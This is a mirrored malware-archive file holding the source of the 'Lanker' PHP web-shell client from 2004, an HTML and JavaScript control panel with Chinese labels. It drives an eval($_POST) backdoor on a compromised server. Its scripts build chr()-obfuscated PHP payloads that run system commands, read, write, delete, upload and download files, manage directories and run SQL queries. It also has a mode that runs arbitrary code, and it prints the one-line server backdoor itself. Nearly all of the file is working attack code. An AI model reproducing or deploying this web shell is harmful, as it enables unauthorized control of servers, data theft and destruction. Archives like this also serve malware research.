Mirrors
/
vxug-MalwareSourceCode
mirror of https://github.com/vxunderground/MalwareSourceCode
13
1
Fork 0
Code Releases Activity
vxug-MalwareSourceCode/PHP/Backdoor.PHP.Lanker.a

295 lines
15 KiB
Plaintext
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

<HTML><HEAD>
<!-- codz by Lanker(QQ:18779569)、孟兄(QQ:80607005) 2004/12/22-->
<META content="text/html; charset=gb2312" http-equiv=Content-Type>
<META content="MSHTML 5.00.2614.3500" name=GENERATOR>
<style>
<!--
td {font-size:8pt; color: #666666;font-family:Verdana}
INPUT {font-size:9pt;BORDER-RIGHT: #cccccc 1px solid; BORDER-TOP: #cccccc 1px solid; BORDER-LEFT: #cccccc 1px solid; COLOR: #666666; BORDER-BOTTOM: #cccccc 1px solid; BACKGROUND-COLOR: #ffffff}
textarea {font-size:9pt;BORDER-RIGHT: #cccccc 1px solid; BORDER-TOP: #cccccc 1px solid; BORDER-LEFT: #cccccc 1px solid; COLOR: #666666; BORDER-BOTTOM: #cccccc 1px solid; BACKGROUND-COLOR: #ffffff}
select {font-size:9pt;BORDER-RIGHT: #cccccc 1px solid; BORDER-TOP: #cccccc 1px solid; BORDER-LEFT: #cccccc 1px solid; COLOR: #666666; BORDER-BOTTOM: #cccccc 1px solid; BACKGROUND-COLOR: #ffffff}
BODY {font-size:9pt; color: #666666;font-family:Verdana; SCROLLBAR-FACE-COLOR: #ffffff; background color:#eeeeee;cursor:SCROLLBAR-HIGHLIGHT-COLOR: #ffffff; SCROLLBAR-SHADOW-COLOR: #aaaaaa; SCROLLBAR-3DLIGHT-COLOR: #aaaaaa; SCROLLBAR-ARROW-COLOR: #dddddd; SCROLLBAR-TRACK-COLOR: #ffffff; SCROLLBAR-DARKSHADOW-COLOR: #ffffff }
a:link {text-decoration:none; color:#336699}
a:visited {text-decoration:none; color:#336699}
a:active {text-decoration:none; color:#336699}
a:hover {COLOR: #b4c8d8; }
.tb {BORDER-RIGHT: #cccccc 1px solid; BORDER-TOP: #cccccc 1px solid; BORDER-LEFT: #cccccc 1px solid; BORDER-BOTTOM: #cccccc 1px solid;background-color:#cccccc}
.tb0 {BORDER-RIGHT: #cccccc 1px solid; BORDER-TOP: #cccccc 1px solid; BORDER-LEFT: #cccccc 1px solid; BORDER-BOTTOM: #cccccc 1px solid;background-color:#fcfcfc}
.tb1 {background-color:#ffffff} </style>
-->
</STYLE>
</HEAD>
<BODY style="FONT-SIZE: 9pt" bgcolor="#cccccc">
<CENTER style="cursor:hand;">
<font color="#000080">
lanker微型<FONT color=#ff3300>PHP</font>后门客户端2.0正式版</font>
</CENTER>
<hr size="1" color="#000080">
<FORM ENCTYPE="multipart/form-data" name=frm method=post target=qq2>
<TABLE style="FONT-SIZE: 9pt">
<TD width=800 height=10>木马地址: <INPUT
style="BORDER-RIGHT: 1px solid; BORDER-TOP: 1px solid; FONT-SIZE: 9pt; BORDER-LEFT: 1px solid; BORDER-BOTTOM: 1px solid"
size=85 value=http://127.0.0.1/door.php name=act> 密码: <INPUT
style="BORDER-RIGHT: 1px solid; BORDER-TOP: 1px solid; FONT-SIZE: 9pt; BORDER-LEFT: 1px solid; BORDER-BOTTOM: 1px solid"
size=20 value=cmd name=para><input type=hidden name='tmpcmd'></TD></TABLE>
<TABLE width=750 >
<TD bgcolor=#ffffff><TABLE style="FONT-SIZE: 9pt" ><tr width=200 height=10>
<select onchange="showDiv(this.value);">
<option value="digest" >----基本功能列表----</option>
<option value="1" >PHP环境变量</option>
<option value="2" >本程序目录</option>
<option value="3" >执行CMD命令</option>
<option value="6" >读取目录</option>
<option value="14" >创建目录</option>
<option value="15" >删除目录</option>
<option value="4" >上传文件</option>
<option value="5" >读取文件</option>
<option value="12" >创建文件</option>
<option value="7" >复制文件</option>
<option value="8" >重命名文件</option>
<option value="9" >删除文件</option>
<option value="13" >下载文件</option>
<option value="11" >执行SQL语句</option>
<option value="10" >专家模式(自己写代码)</option>
</select></tr><tr height=260><TD id="yunxing" >LANKER微型PHP后门服务端代码<br>&lt;?php eval($_POST[cmd])?><hr size="1" color="#000080"><br>容错代码为:<br>&lt;?php @eval($_POST[cmd])?><TD></tr></TABLE></td><td><TABLE style="FONT-SIZE: 9pt"><IFRAME border=1 height=340 width=580 name=qq2 marginwidth=0 marginheight=0 vspace=0
src="about:blank"
frameborder=no scrolling=auto name=ifff value="fdsadfas"></IFRAME></TABLE></td></table>
</form>
<hr size="1" color="#000080">
<CENTER>
<center><font class=font>PHP soft Web Shell v2.0<br>
-------------Code By <FONT color=#ff3300>lanker</font>、<FONT color=#ff3300>孟兄</font> ----------- <br><FONT color=#ff3300>声明:请勿使用本程序从事非法行为,否则后果自负!</font></center>
</BODY></HTML>
<script language="javascript">
function showDiv(aa){
switch(aa)
{
case "1":
yunxing.innerHTML="PHP环境变量<br>"
yunxing.innerHTML+="<p align='center'><INPUT onclick='Javascipt:frm.tmpcmd.name=frm.para.value;frm.tmpcmd.value=\"phpinfo();\";frm.action=document.all.act.value;frm.submit();frm.tmpcmd.name=tmpcmd' type=button value='提 交' name=Send><br><br><br><br><br><br><br><br><br><br>"
break;
case "2":
yunxing.innerHTML="<p align='center'>本程序目录<br><INPUT onclick='Javascipt:frm.tmpcmd.name=frm.para.value;frm.tmpcmd.value=\"echo dirname(__FILE__);\";frm.action=document.all.act.value;frm.submit();frm.tmpcmd.name=tmpcmd' type=button value='提 交' name=Send><br><br><br><br><br><br><br><br><br><br>"
break;
case "3":
yunxing.innerHTML="<p align='center'><INPUT size=24 name=\"aaaa\"><br><INPUT onclick='Javascipt:frm.tmpcmd.name=frm.para.value;cmd();frm.action=document.all.act.value;frm.submit();frm.tmpcmd.name=tmpcmd' type=button value='提 交' name=Send><br><br><br><br><br><br><br><br><br><br>"
break;
case "4":
yunxing.innerHTML="<p align='center'><input NAME='LanKerF' TYPE='file' size=13><br><INPUT onclick='Javascipt:frm.tmpcmd.name=frm.para.value;frm.tmpcmd.value=\"if (copy($_FILES[LanKerF][tmp_name],$_FILES[LanKerF][name])) echo OK;\";frm.action=document.all.act.value;frm.submit();frm.tmpcmd.name=tmpcmd' type=button value='提 交' name=Send><br><br><br><br><br><br><br><br><br><br>"
break;
case "5":
yunxing.innerHTML="<p align='center'>文件名:<br><INPUT size=24 name=\"duqu\"><br><INPUT onclick='Javascipt:frm.tmpcmd.name=frm.para.value;readfile();frm.action=document.all.act.value;frm.submit();frm.tmpcmd.name=tmpcmd' type=button value='提 交' name=Send> <br><br><br><br><br><br><br><br><br><br>"
break;
case "6":
yunxing.innerHTML="<p align='center'>目录名:<br><INPUT size=24 name=\"duqu\"><br><INPUT onclick='Javascipt:frm.tmpcmd.name=frm.para.value;readdir();frm.action=document.all.act.value;frm.submit();frm.tmpcmd.name=tmpcmd' type=button value='提 交' name=Send><br><br><br><br><br><br><br><br><br><br>"
break;
case "7":
yunxing.innerHTML="<p align='center'>文件1:<br><INPUT size=24 name=\"file1\"><br>文件2:<br><INPUT size=24 name=\"file2\"><br><INPUT onclick='Javascipt:frm.tmpcmd.name=frm.para.value;copyfile();frm.action=document.all.act.value;frm.submit();frm.tmpcmd.name=tmpcmd' type=button value='提 交' name=Send><br><br><br><br><br><br><br><br><br><br>"
break;
case "8":
yunxing.innerHTML="<p align='center'>文件1:<br><INPUT size=24 name=\"file1\"><br>文件2:<br><INPUT size=24 name=\"file2\"><br><INPUT onclick='Javascipt:frm.tmpcmd.name=frm.para.value;renamefile();frm.action=document.all.act.value;frm.submit();frm.tmpcmd.name=tmpcmd' type=button value='提 交' name=Send><br><br><br><br><br><br><br><br><br><br>"
break;
case "9":
yunxing.innerHTML="<p align='center'>文件名:<br><INPUT size=24 name=\"filen\"><br><INPUT onclick='Javascipt:frm.tmpcmd.name=frm.para.value;delfile();frm.action=document.all.act.value;frm.submit();frm.tmpcmd.name=tmpcmd' type=button value='提 交' name=Send><br><br><br><br><br><br><br><br><br><br>"
break;
case "10":
yunxing.innerHTML="<p align='center'><textarea rows='17' name='duqu' cols='22'>phpinfo();</textarea>"
yunxing.innerHTML+="<br><INPUT onclick='Javascipt:frm.tmpcmd.name=frm.para.value;frm.tmpcmd.value=frm.duqu.value;frm.action=document.all.act.value;frm.submit();frm.tmpcmd.name=tmpcmd' type=button value='提 交' name=Send>"
break;
case "11":
yunxing.innerHTML="主机:<input NAME=\"servername\" TYPE=\"text\" value=\"localhost\" size=\"12\" ><BR>数据库:<input NAME=\"dbname\" TYPE=\"text\" value size=\"10\" > &nbsp;<BR>用户名:<input NAME=\"dbusername\" TYPE=\"text\" value=\"root\" size=\"10\" >&nbsp; <BR>密码:<input NAME=\"dbpassword\" TYPE=\"text\" value size=\"12\" > &nbsp; <BR>SQL语句:<BR><textarea rows=\"8\" name=\"sql\" cols=\"20\" ></textarea>"
yunxing.innerHTML+="<br><INPUT onclick='Javascipt:frm.tmpcmd.name=frm.para.value;SQL();frm.action=document.all.act.value;frm.submit();frm.tmpcmd.name=tmpcmd' type=button value='提 交' name=Send>"
break;
case "12":
yunxing.innerHTML="<p align='center'>文件名:<INPUT size=14 name=\"filen\"><br>文件内容:<BR><textarea rows=\"16\" name=\"filec\" cols=\"20\" >注意:不支持中文字符!</textarea><br><INPUT onclick='Javascipt:frm.tmpcmd.name=frm.para.value;createfile();frm.action=document.all.act.value;frm.submit();frm.tmpcmd.name=tmpcmd' type=button value='提 交' name=Send><br><br><br><br><br><br><br><br><br><br>"
break;
case "13":
yunxing.innerHTML="<p align='center'>文件名:<br><INPUT size=24 name=\"filen\"><br><INPUT onclick='Javascipt:frm.tmpcmd.name=frm.para.value;downfile();frm.action=document.all.act.value;frm.submit();frm.tmpcmd.name=tmpcmd' type=button value='提 交' name=Send><br><br><br><br><br><br><br><br><br><br>"
break;
case "14":
yunxing.innerHTML="<p align='center'>目录名:<br><INPUT size=24 name=\"dir\"><br><INPUT onclick='Javascipt:frm.tmpcmd.name=frm.para.value;createdir();frm.action=document.all.act.value;frm.submit();frm.tmpcmd.name=tmpcmd' type=button value='提 交' name=Send><br><br><br><br><br><br><br><br><br><br>"
break;
case "15":
yunxing.innerHTML="<p align='center'>目录名:<br><INPUT size=24 name=\"dir\"><br><INPUT onclick='Javascipt:frm.tmpcmd.name=frm.para.value;rmdir();frm.action=document.all.act.value;frm.submit();frm.tmpcmd.name=tmpcmd' type=button value='提 交' name=Send><br><br><br><br><br><br><br><br><br><br>"
break;
}
}
function cmd(){
frm.tmpcmd.value="$cmd="
frm.tmpcmd.value+=duqu(frm.aaaa.value)
frm.tmpcmd.value+=";\n"
frm.tmpcmd.value+="echo chr(60).chr(112).chr(114).chr(101).chr(62);\n"
frm.tmpcmd.value+="@system($cmd);\n"
frm.tmpcmd.value+="echo chr(60).chr(47).chr(112).chr(114).chr(101).chr(62);\n"
}
function readfile(){
frm.tmpcmd.value="$filename="
frm.tmpcmd.value+=duqu(frm.duqu.value)
frm.tmpcmd.value+=";\n"
frm.tmpcmd.value+="$s=chr(60).chr(112).chr(114).chr(101).chr(62);\n"
frm.tmpcmd.value+="$e=chr(60).chr(47).chr(112).chr(114).chr(101).chr(62);\n"
frm.tmpcmd.value+="$fp=@fopen($filename,r);\n"
frm.tmpcmd.value+="$contents=@fread($fp, filesize($filename));\n"
frm.tmpcmd.value+="@fclose($fp);\n"
frm.tmpcmd.value+="$contents=htmlspecialchars($contents);\n"
frm.tmpcmd.value+="echo $s.$contents.$e;\n"
}
function readdir(){
frm.tmpcmd.value="$dir="
frm.tmpcmd.value+=duqu(frm.duqu.value)
frm.tmpcmd.value+=";\n"
frm.tmpcmd.value+="$f = chr(60).chr(98).chr(114).chr(62);"
frm.tmpcmd.value+="$dir=@dir($dir);"
frm.tmpcmd.value+="if($dir) "
frm.tmpcmd.value+="{"
frm.tmpcmd.value+=" echo path_______.$dir->path.$f;"
frm.tmpcmd.value+=" while($entry=$dir->read())"
frm.tmpcmd.value+=" {"
frm.tmpcmd.value+=" echo ____.$entry.$f; "
frm.tmpcmd.value+=" }"
frm.tmpcmd.value+=" $dir->close();"
frm.tmpcmd.value+="}"
frm.tmpcmd.value+="else"
frm.tmpcmd.value+="{echo 0;}"
}
function SQL(){
frm.tmpcmd.value="$message=chr(102).chr(97).chr(105).chr(108).chr(33);\n"
frm.tmpcmd.value+="$fgf=chr(32);\n"
frm.tmpcmd.value+="$servername="
frm.tmpcmd.value+=duqu(frm.servername.value)
frm.tmpcmd.value+=";\n"
frm.tmpcmd.value+="$dbusername="
frm.tmpcmd.value+=duqu(frm.dbusername.value)
frm.tmpcmd.value+=";\n"
frm.tmpcmd.value+="$dbpassword="
frm.tmpcmd.value+=duqu(frm.dbpassword.value)
frm.tmpcmd.value+=";\n"
frm.tmpcmd.value+="$dbname="
frm.tmpcmd.value+=duqu(frm.dbname.value)
frm.tmpcmd.value+=";\n"
frm.tmpcmd.value+="$sql="
frm.tmpcmd.value+=duqu(frm.sql.value)
frm.tmpcmd.value+=";\n"
frm.tmpcmd.value+="@mysql_connect($servername,$dbusername,$dbpassword) or die($message);\n"
frm.tmpcmd.value+="@mysql_select_db($dbname) or die($message);\n"
frm.tmpcmd.value+="$result = @mysql_query($sql);\n"
frm.tmpcmd.value+="if($result){\n"
frm.tmpcmd.value+="echo SQL语句成功执行;}\n"
frm.tmpcmd.value+="else{echo 失败.mysql_error();}\n"
frm.tmpcmd.value+="mysql_close();"
}
function createfile(){
frm.tmpcmd.value="$filen="
frm.tmpcmd.value+=duqu(frm.filen.value)
frm.tmpcmd.value+=";\n"
frm.tmpcmd.value+="$filec="
frm.tmpcmd.value+=duqu(frm.filec.value)
frm.tmpcmd.value+=";\n"
frm.tmpcmd.value+="$a=chr(119);\n"
frm.tmpcmd.value+="$fp=@fopen($filen,$a);\n"
frm.tmpcmd.value+="$msg=@fwrite($fp,$filec);\n"
frm.tmpcmd.value+="if($msg) echo chr(79).chr(75).chr(33);\n"
frm.tmpcmd.value+="@fclose($fp);\n"
}
function copyfile(){
frm.tmpcmd.value="$file1="
frm.tmpcmd.value+=duqu(frm.file1.value)
frm.tmpcmd.value+=";\n"
frm.tmpcmd.value+="$file2="
frm.tmpcmd.value+=duqu(frm.file2.value)
frm.tmpcmd.value+=";\n"
frm.tmpcmd.value+="if (@copy($file1,$file2)) echo chr(79).chr(75).chr(33);\n"
}
function renamefile(){
frm.tmpcmd.value="$file1="
frm.tmpcmd.value+=duqu(frm.file1.value)
frm.tmpcmd.value+=";\n"
frm.tmpcmd.value+="$file2="
frm.tmpcmd.value+=duqu(frm.file2.value)
frm.tmpcmd.value+=";\n"
frm.tmpcmd.value+="if (@rename($file1,$file2)) echo chr(79).chr(75).chr(33);\n"
}
function downfile(){
frm.tmpcmd.value="$df="
frm.tmpcmd.value+=duqu(frm.filen.value)
frm.tmpcmd.value+=";\n"
frm.tmpcmd.value+="$f=chr(46);"
frm.tmpcmd.value+="$h=chr(67).chr(111).chr(110).chr(116).chr(101).chr(110).chr(116).chr(45).chr(116).chr(121).chr(112).chr(101).chr(58).chr(32).chr(97).chr(112).chr(112).chr(108).chr(105).chr(99).chr(97).chr(116).chr(105).chr(111).chr(110).chr(47).chr(120).chr(45);\n"
frm.tmpcmd.value+="$h1=chr(67).chr(111).chr(110).chr(116).chr(101).chr(110).chr(116).chr(45).chr(68).chr(105).chr(115).chr(112).chr(111).chr(115).chr(105).chr(116).chr(105).chr(111).chr(110).chr(58).chr(32).chr(97).chr(116).chr(116).chr(97).chr(99).chr(104).chr(109).chr(101).chr(110).chr(116).chr(59).chr(32).chr(102).chr(105).chr(108).chr(101).chr(110).chr(97).chr(109).chr(101).chr(61);\n"
frm.tmpcmd.value+="$h2=(68).chr(101).chr(115).chr(99).chr(114).chr(105).chr(112).chr(116).chr(105).chr(111).chr(110).chr(58).chr(32).chr(80).chr(72).chr(80).chr(51).chr(32).chr(71).chr(101).chr(110).chr(101).chr(114).chr(97).chr(116).chr(101).chr(100).chr(32).chr(68).chr(97).chr(116).chr(97);\n"
frm.tmpcmd.value+="$fn = basename($df);\n"
frm.tmpcmd.value+="$fe = $finfo[count($finfo)-1];\n"
frm.tmpcmd.value+="$finfo = explode($f, $fn);\n"
frm.tmpcmd.value+="header($h.$fe);\n"
frm.tmpcmd.value+="header($h1.$fn);\n"
frm.tmpcmd.value+="header($h2);\n"
frm.tmpcmd.value+="@readfile($df);\n"
frm.tmpcmd.value+="header($h2);\n"
frm.tmpcmd.value+="exit;\n"
}
function delfile(){
frm.tmpcmd.value="$filen="
frm.tmpcmd.value+=duqu(frm.filen.value)
frm.tmpcmd.value+=";\n"
frm.tmpcmd.value+="if(@unlink($filen)) echo chr(79).chr(75).chr(33);"
}
function createdir(){
frm.tmpcmd.value="$dirs="
frm.tmpcmd.value+=duqu(frm.dir.value)
frm.tmpcmd.value+=";\n"
frm.tmpcmd.value+="if(@mkdir($dirs,0777)) echo chr(79).chr(75).chr(33);"
}
function rmdir(){
frm.tmpcmd.value="$dirs="
frm.tmpcmd.value+=duqu(frm.dir.value)
frm.tmpcmd.value+=";\n"
frm.tmpcmd.value+="if(@rmdir($dirs)) echo chr(79).chr(75).chr(33);"
}
function returnc(){
alret("document.frm.ifff.value")
}
</script>
<script >
function duqu(zifu){
var duqu="";
for(i=1;i<zifu.length;i++){
duqu+="chr("+zifu.charCodeAt(i-1)+").";
}
duqu+="chr("+zifu.charCodeAt(zifu.length-1)+")";
return duqu
}
</script>
View Git Blame Copy Permalink